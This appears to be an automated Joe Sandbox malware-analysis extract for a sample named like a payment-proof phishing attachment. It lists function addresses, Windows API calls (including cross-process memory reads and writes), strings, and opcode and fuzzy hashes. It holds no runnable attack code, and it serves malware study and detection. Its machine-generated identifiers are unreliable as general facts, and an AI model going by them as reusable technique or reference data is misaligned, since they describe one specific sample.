Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 92bba18e7788980c6dc7b83c2672e9d6b980df756b084c120c011f0c799ba613
Instruction ID: 8434bc84497582de4dfa907547eb2d84ab1ae29d06f5741c8dd3baee407ea630
Opcode Fuzzy Hash: 92bba18e7788980c6dc7b83c2672e9d6b980df756b084c120c011f0c799ba613
Instruction Fuzzy Hash: DD21A475D0020AEFDB309FA4E94AB9A7B68B714365F14431EF4A1A20C4D37A5855EB90

Function 00FD217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00FD21A9
CreateThread.KERNEL32(?,?,00FD22DF,00000000,?,?), ref: 00FD21ED
GetLastError.KERNEL32 ref: 00FD21F7
_free.LIBCMT ref: 00FD2200
__dosmaperr.LIBCMT ref: 00FD220B

Part of subcall function 00FD7C0E: __getptd_noexit.LIBCMT ref: 00FD7C0E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 72a6d2205a3c8cc7e9427704383ae1f72b70c031e55d3442c5aae92360f2232d
Instruction ID: 55f9037c0c1f322e062722a014069865be395cb177992cb53fbb2171bd43b2b9
Opcode Fuzzy Hash: 72a6d2205a3c8cc7e9427704383ae1f72b70c031e55d3442c5aae92360f2232d
Instruction Fuzzy Hash: 6011E5331043066FAB21BFA5DC41D9B379AEF50770718402BF914C6345EB35D811A7E0

Function 00FEABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00FEABD7
GetLastError.KERNEL32(?,00FEA69F,?,?,?), ref: 00FEABE1
GetProcessHeap.KERNEL32(00000008,?,?,00FEA69F,?,?,?), ref: 00FEABF0
HeapAlloc.KERNEL32(00000000,?,00FEA69F,?,?,?), ref: 00FEABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00FEAC0E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 5e3c0fcb530b2b94f0d0055d359907bdcc9192a096dea49e2fad3c0ecddbe358
Instruction ID: 2effb524a942c4f6a8b518634f152f6a7f629838bd995ec387fed0d4c5f9be08
Opcode Fuzzy Hash: 5e3c0fcb530b2b94f0d0055d359907bdcc9192a096dea49e2fad3c0ecddbe358
Instruction Fuzzy Hash: 25016970600244BFDB214FAADC48DAB3BBCEF8A364720042AF985C3240DA72DC40EB60

Function 00FE9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00FE9ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 00FE9AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00FE9B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00FE9B15
CLSIDFromString.OLE32(?,?), ref: 00FE9B21

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 73a21e04672d9dd3afcf9637f3bd9180c921f10be1ff642086b7a52d21bd1023
Instruction ID: b4e3d89cf2943836b96f2ffbc75e49c7a08fef83c506c3ecbfe9ded89045e757
Opcode Fuzzy Hash: 73a21e04672d9dd3afcf9637f3bd9180c921f10be1ff642086b7a52d21bd1023
Instruction Fuzzy Hash: CD01A276A00204BFDB204FA6EC44B9A7BFDEF84761F148425F949D2200D7B9DE01ABB0

Function 00FF7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FF7A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00FF7A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FF7A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00FF7A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FF7AD0

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 8d60c892717dcd2aa06519c214dfc3609e44c0e57c1dee14da5a0ba169022bb1
Instruction ID: 613570e6c3dcab4670bc1a69d17a1116f8978d74c1ad3d62569c95d051a6456c
Opcode Fuzzy Hash: 8d60c892717dcd2aa06519c214dfc3609e44c0e57c1dee14da5a0ba169022bb1
Instruction Fuzzy Hash: D0014C32D0972DEBCF10AFE4D848AEDFB78FF08711F420455E642B2164DB39965097A1

Function 00FEAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FEAADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FEAAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FEAAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FEAAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FEAB10

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 2a878f99f547b511f3e156af89756993b5eb251ec1f81be16d68195d22dc4734
Instruction ID: cb82379dc50e2a5158fa15ce597555a8b6542f13bd5baacc20561952722a186f
Opcode Fuzzy Hash: 2a878f99f547b511f3e156af89756993b5eb251ec1f81be16d68195d22dc4734
Instruction Fuzzy Hash: 19F04F712002087FEB221EA5EC88FA73B6DFF85768B40002AF981C7180CA65EC119B61

Function 00FEAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FEAA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FEAA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FEAA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FEAA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FEAAAF

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 4bb8fc1f9b95dc66ff166a76a768edad92ea149bf219cca3852cb2c2879b4b7b
Instruction ID: 0332c3012d30f94addbb2a474a3fe3a2392b556fb745200a682387560bf6471d
Opcode Fuzzy Hash: 4bb8fc1f9b95dc66ff166a76a768edad92ea149bf219cca3852cb2c2879b4b7b
Instruction Fuzzy Hash: B1F04F71200304BFEB215EE5AC89FA77BACFF49B64B404429F981C7180DA69EC51DB61

Function 00FEEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00FEEC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 00FEECAB
MessageBeep.USER32(00000000), ref: 00FEECC3
KillTimer.USER32(?,0000040A), ref: 00FEECDF
EndDialog.USER32(?,00000001), ref: 00FEECF9

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: b9c7397c03e0d5c5646b0d4cceab781d70ae3ef7712767dcb3eba732f7b205bc
Instruction ID: dcf6a82cf415877fd1d484b3e43171f41d6021cdbb1ff9117e87f887f9faa76b
Opcode Fuzzy Hash: b9c7397c03e0d5c5646b0d4cceab781d70ae3ef7712767dcb3eba732f7b205bc
Instruction Fuzzy Hash: 3C01D130900744ABEB305B65EE4EB9677BCFB00B05F100559B6C3A10D0EBF9AA54DB80

Function 00FCB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00FCB0BA
StrokeAndFillPath.GDI32(?,?,0102E680,00000000,?,?,?), ref: 00FCB0D6
SelectObject.GDI32(?,00000000), ref: 00FCB0E9
DeleteObject.GDI32 ref: 00FCB0FC
StrokePath.GDI32(?), ref: 00FCB117

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 787f8c7dcd4abcd624da85cf5b47551ca375174ea4a03a823bad5efcef61eb1c
Instruction ID: 9710a0beef2c468e1c03a29d98d84c452be3459fe221c5e933fe680570aaaf38
Opcode Fuzzy Hash: 787f8c7dcd4abcd624da85cf5b47551ca375174ea4a03a823bad5efcef61eb1c
Instruction Fuzzy Hash: 01F03C38900205EFCB319FA5E90EB543F69B704772F488318F4A5550E8C73A8999EF50

Function 00FFF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00FFF2DA
CoCreateInstance.OLE32(0103DA7C,00000000,00000001,0103D8EC,?), ref: 00FFF2F2
CoUninitialize.OLE32 ref: 00FFF555

Strings

.lnk, xrefs: 00FFF28B, 00FFF290, 00FFF29E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 7c0db7317dc63261601af08ac8b8f2bc1143d54f8192161c0124b139871d4c65
Instruction ID: 5c548b70cfc4fb55cc1101adbd8ed4e57d40153a40969702d4af3ee9a6884400
Opcode Fuzzy Hash: 7c0db7317dc63261601af08ac8b8f2bc1143d54f8192161c0124b139871d4c65
Instruction Fuzzy Hash: 3AA12B71104201AFD300EFA4CC82EAFB7ACEF98714F44491DF555972A2DB74EA09DB92

Function 00FFE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FB660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB53B1,?,?,00FB61FF,?,00000000,00000001,00000000), ref: 00FB662F

CoInitialize.OLE32(00000000), ref: 00FFE85D
CoCreateInstance.OLE32(0103DA7C,00000000,00000001,0103D8EC,?), ref: 00FFE876
CoUninitialize.OLE32 ref: 00FFE893

Part of subcall function 00FB936C: __swprintf.LIBCMT ref: 00FB93AB
Part of subcall function 00FB936C: __itow.LIBCMT ref: 00FB93DF

Strings

.lnk, xrefs: 00FFE83B, 00FFE84D

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 2bdca9aa207b1e6afc50df7806fc1dcf80b3808a77f2ee4c8b42257c8a70250e
Instruction ID: 8ec52a24779e2e42a192d00ede5bd85e7ed615deee6b1b02b703f92fa69fad39
Opcode Fuzzy Hash: 2bdca9aa207b1e6afc50df7806fc1dcf80b3808a77f2ee4c8b42257c8a70250e
Instruction Fuzzy Hash: 07A146356043059FCB10DF15C884D6EBBE9BF88720F048958FAAA9B3A1CB75EC45DB91

Function 00FD325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00FD32ED

Part of subcall function 00FDE0D0: __87except.LIBCMT ref: 00FDE10B

Strings

pow, xrefs: 00FD32C5, 00FD32E2

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 74e7c2f1ea661df24f7b16cad39d04d83b1abc8f94d67c7a1cc64d4e35bd4902
Instruction ID: 3b588c468663787b84317963e7c9c25b5f388f84b4072a3013b15e2ac75c3086
Opcode Fuzzy Hash: 74e7c2f1ea661df24f7b16cad39d04d83b1abc8f94d67c7a1cc64d4e35bd4902
Instruction Fuzzy Hash: 60517972F0820192CB217A14DA4137E7B96AB40731F3C8D2BF4C58A399DE398D94B743

Function 00FF4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0104DC50,?,0000000F,0000000C,00000016,0104DC50,?), ref: 00FF4645

Part of subcall function 00FB936C: __swprintf.LIBCMT ref: 00FB93AB
Part of subcall function 00FB936C: __itow.LIBCMT ref: 00FB93DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 00FF46C5

Strings

THIS, xrefs: 00FF4703
REMOVE, xrefs: 00FF4676

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: 8e41be1f56bdb55333877df536dacef42d3328f4e756c664b7c4cc8f596a2862
Instruction ID: 4dbed896a4da77d726277d7b7859166bc6725a9eb2dd29e6ce1dfcb83596bda4
Opcode Fuzzy Hash: 8e41be1f56bdb55333877df536dacef42d3328f4e756c664b7c4cc8f596a2862
Instruction Fuzzy Hash: 2A416F35A0020D9FCF01EF55C881ABEB7B5BF49314F148059EA16AB2A1D778AD45EF50

Function 00FEC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FEBC08,?,?,00000034,00000800,?,00000034), ref: 00FF4335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FEC1D3

Part of subcall function 00FF42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FEBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00FF4300

Part of subcall function 00FF422F: GetWindowThreadProcessId.USER32(?,?), ref: 00FF425A
Part of subcall function 00FF422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FEBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00FF426A
Part of subcall function 00FF422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FEBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00FF4280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FEC240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FEC28D

Strings

@, xrefs: 00FEC2A5

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: c6cc00eb50a5b47ff0ae3d64c1704da7ac0ce5c8e81c50d38df078f6c9f482e4
Instruction ID: a4c45dc50e3568eb93b851c30b50be65a07430d572517c8cc59870463c3ade76
Opcode Fuzzy Hash: c6cc00eb50a5b47ff0ae3d64c1704da7ac0ce5c8e81c50d38df078f6c9f482e4
Instruction Fuzzy Hash: 7141397290021CAFDB10DFA4CC81AEEB7B8BF09710F004095FA55B7191DA75AE45EBA1

Function 0101A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0104DC00,00000000,?,?,?,?), ref: 0101A6D8
GetWindowLongW.USER32 ref: 0101A6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0101A705

Strings

SysTreeView32, xrefs: 0101A6AA

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 589bcc24b4ab03050c25c89c31bac471a0f37850b5197ec3bb29a2fb4ee7deb3
Instruction ID: 8aa2590cce32b449ac06b0ea15160ebf92c7ac537a426e15100fe342a05d8022
Opcode Fuzzy Hash: 589bcc24b4ab03050c25c89c31bac471a0f37850b5197ec3bb29a2fb4ee7deb3
Instruction Fuzzy Hash: AF31C13160124AAFDB218E78CC41BEA7BA9FB49334F144719F9B5932D5C738E9509B50

Function 0101A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0101A15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0101A172
SendMessageW.USER32(?,00001002,00000000,?), ref: 0101A196

Strings

SysMonthCal32, xrefs: 0101A129

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 89e615fd5875dac87875c10fe0cc2fda15e623249786e30c38d6de319d46d84c
Instruction ID: 603815351e27abfd178077b326afce2fdc03a245a1e1c35e696673ef3f2cc6ef
Opcode Fuzzy Hash: 89e615fd5875dac87875c10fe0cc2fda15e623249786e30c38d6de319d46d84c
Instruction Fuzzy Hash: 9621D332600218ABEF128E94CC42FEE3BB9EF48754F010114FE956B1D1D6B9E850CB90

Function 0101A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0101A941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0101A94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0101A956

Strings

msctls_updown32, xrefs: 0101A8BB

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 533a52dca4e348288ee2e79bf8f227e4d8032344d62fc6c987fbec62b837f692
